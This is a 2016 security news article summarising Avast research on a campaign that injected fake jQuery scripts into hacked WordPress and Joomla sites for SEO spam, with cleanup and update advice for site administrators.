WordPress and Joomla Sites Hacked to Host Malicious JavaScript Code

Sunday, April 03, 2016

Ionut Arghire

Fa42af438e58b799189dd26386f5870f

Over the past few months, hackers have been abusing popular JavaScript library jQuery to inject malicious scripts into the head sections of websites powered by WordPress and Joomla, Avast researchers say.

Historically, fake jQuery injections have been highly popular among cybercriminals, but the recently observed infection campaign has managed to compromise a very large number of domains, thus exposing millions of users to the malicious code.

With almost 70 million unique files on hacked websites containing the fake jQuery script, the infection has reached an abnormal high number of domains, Avast’s Alexej Savčin explains in a blog post. Starting in November, the security company has observed over 4.5 million users being exposed to these compromised websites, the researcher says.

While website visitors are unaware of the infection, a quick look at the page’s code reveals the jQuery script in the head section of CML websites powered by WordPress and Joomla. As Avast explains, the code does not appear obfuscated and reveals a few variables and one IF statement which inserts another JavaScript source.

However, there is a change in “var base =”, which points to another hacked website, which in turn is used as the source of the injected malicious script. What researchers discovered was the fact that hacked domains were used to host the malicious JavaScript code, and that the attack was effective enough to continue being popular on a daily basis.

According to Avast, the malicious code starts with a 10 milliseconds countdown, which is a common practice in injection-type coding, although a longer delay is more typical. Next, the special “encodeURIComponent” function is used almost in every line to encode special characters like: (, / ? : @ & = + $ #).

“The final condition checks if variables contain necessary values and after evaluation another source for script is inserted. This URL is then used to increase SEO rank for other domains. Using referral page and backlinks makes it more valid,” Savčin explains.

Site Admins who have fallen victim to the infection are advised to start cleaning their computers first, as the root source of the infection might be on their local machine. Next, they should scan their website for compromised files and try to clean them, or delete all of them and replace them with a recent, clean backup (they should, however, be wary of deleting system files).

The issue with this type of compromise is that all files should be clean for the infection to be completely removed, as it would be reinstated if only one, even insignificant file is still compromised. Moreover, if the website is hosted on a server where other infected sites are hosted, chances are that the infection will spread to it as well.

After cleaning the website, administrators are also advised to update their WordPress or Joomla installation, as older versions are more susceptible to compromise. They should also perform regular backups of their website, to make sure they can easily restore it to a clean state in case of compromise.

Related: WordPress Sites Used to Power Layer 7 DDoS Attacks

Related: Backdoor in WordPress Plugin Steals Admin Credentials

Possibly Related Articles:
11668
malware Wordpress jQuery
Post Rating I Like this!
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.